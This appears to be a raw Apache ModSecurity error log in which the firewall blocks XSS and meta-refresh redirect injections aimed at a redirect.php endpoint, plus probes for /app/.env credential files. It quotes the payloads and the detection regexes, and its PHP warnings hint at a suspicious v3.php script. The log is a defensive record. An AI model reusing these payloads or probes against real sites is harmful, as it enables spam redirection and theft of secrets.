content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "C [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt9NVI9ymHBxup74-DZAAAAIU"]
[Tue May 12 02:01:56.340214 2026] [security2:error] [pid 1695975:tid 1695983] [client 27.78.84.116:62975] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt9NVI9ymHBxup74-DZAAAAIU"]
[Tue May 12 02:01:56.340605 2026] [security2:error] [pid 1695975:tid 1695983] [client 27.78.84.116:62975] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt9NVI9ymHBxup74-DZAAAAIU"]
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899862/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899862/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899862/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899862/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899862/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899862/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:02:02.755700 2026] [security2:error] [pid 1730175:tid 1730190] [client 27.78.84.116:63569] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt-no6NvB9WXx5V-5w8QAAAQ0"]
[Tue May 12 02:02:02.756452 2026] [security2:error] [pid 1730175:tid 1730190] [client 27.78.84.116:63569] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https:/..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt-no6NvB9WXx5V-5w8QAAAQ0"]
[Tue May 12 02:02:02.756626 2026] [security2:error] [pid 1730175:tid 1730190] [client 27.78.84.116:63569] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt-no6NvB9WXx5V-5w8QAAAQ0"]
[Tue May 12 02:02:02.756728 2026] [security2:error] [pid 1730175:tid 1730190] [client 27.78.84.116:63569] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"]  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt-no6NvB9WXx5V-5w8QAAAQ0"]
[Tue May 12 02:02:02.756899 2026] [security2:error] [pid 1730175:tid 1730190] [client 27.78.84.116:63569] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "C [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt-no6NvB9WXx5V-5w8QAAAQ0"]
[Tue May 12 02:02:02.757332 2026] [security2:error] [pid 1730175:tid 1730190] [client 27.78.84.116:63569] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt-no6NvB9WXx5V-5w8QAAAQ0"]
[Tue May 12 02:02:02.757628 2026] [security2:error] [pid 1730175:tid 1730190] [client 27.78.84.116:63569] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJt-no6NvB9WXx5V-5w8QAAAQ0"]
[Tue May 12 02:02:08.575053 2026] [security2:error] [pid 1707624:tid 1707684] [client 27.78.84.116:64167] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuALOxS7i6i_mT2NK-MwAAAEI"]
[Tue May 12 02:02:08.575486 2026] [security2:error] [pid 1707624:tid 1707684] [client 27.78.84.116:64167] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https:/..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuALOxS7i6i_mT2NK-MwAAAEI"]
[Tue May 12 02:02:08.575748 2026] [security2:error] [pid 1707624:tid 1707684] [client 27.78.84.116:64167] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuALOxS7i6i_mT2NK-MwAAAEI"]
[Tue May 12 02:02:08.575871 2026] [security2:error] [pid 1707624:tid 1707684] [client 27.78.84.116:64167] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"]  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuALOxS7i6i_mT2NK-MwAAAEI"]
[Tue May 12 02:02:08.576103 2026] [security2:error] [pid 1707624:tid 1707684] [client 27.78.84.116:64167] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "C [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuALOxS7i6i_mT2NK-MwAAAEI"]
[Tue May 12 02:02:08.576731 2026] [security2:error] [pid 1707624:tid 1707684] [client 27.78.84.116:64167] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuALOxS7i6i_mT2NK-MwAAAEI"]
[Tue May 12 02:02:08.577140 2026] [security2:error] [pid 1707624:tid 1707684] [client 27.78.84.116:64167] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuALOxS7i6i_mT2NK-MwAAAEI"]
[Tue May 12 02:02:15.733243 2026] [security2:error] [pid 1730175:tid 1730191] [client 176.65.139.236:37414] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.rentparadise.fr"] [uri "/app/.env"] [unique_id "agJuB3o6NvB9WXx5V-5xAgAAAQ4"]
[Tue May 12 02:02:15.733545 2026] [security2:error] [pid 1730175:tid 1730191] [client 176.65.139.236:37414] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.rentparadise.fr"] [uri "/app/.env"] [unique_id "agJuB3o6NvB9WXx5V-5xAgAAAQ4"]
[Tue May 12 02:02:15.734452 2026] [core:error] [pid 1730175:tid 1730191] [client 176.65.139.236:37414] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:02:15.734932 2026] [security2:error] [pid 1730175:tid 1730191] [client 176.65.139.236:37414] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.rentparadise.fr"] [uri "/index.php"] [unique_id "agJuB3o6NvB9WXx5V-5xAgAAAQ4"]
[Tue May 12 02:02:15.751828 2026] [security2:error] [pid 1691274:tid 1691280] [client 176.65.139.229:44902] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pweil.com"] [uri "/app/.env"] [unique_id "agJuB1fdQaraX_prmqcU9gAAAAM"]
[Tue May 12 02:02:15.752053 2026] [security2:error] [pid 1691274:tid 1691280] [client 176.65.139.229:44902] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "pweil.com"] [uri "/app/.env"] [unique_id "agJuB1fdQaraX_prmqcU9gAAAAM"]
[Tue May 12 02:02:15.752521 2026] [security2:error] [pid 1691274:tid 1691280] [client 176.65.139.229:44902] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "pweil.com"] [uri "/app/.env"] [unique_id "agJuB1fdQaraX_prmqcU9gAAAAM"]
[Tue May 12 02:02:16.146496 2026] [security2:error] [pid 1730207:tid 1730224] [client 27.78.84.116:64803] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuCDue9Sp-pIv_Bb6FbAAAAU8"]
[Tue May 12 02:02:16.149310 2026] [security2:error] [pid 1730207:tid 1730224] [client 27.78.84.116:64803] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https:/..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuCDue9Sp-pIv_Bb6FbAAAAU8"]
[Tue May 12 02:02:16.149479 2026] [security2:error] [pid 1730207:tid 1730224] [client 27.78.84.116:64803] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuCDue9Sp-pIv_Bb6FbAAAAU8"]
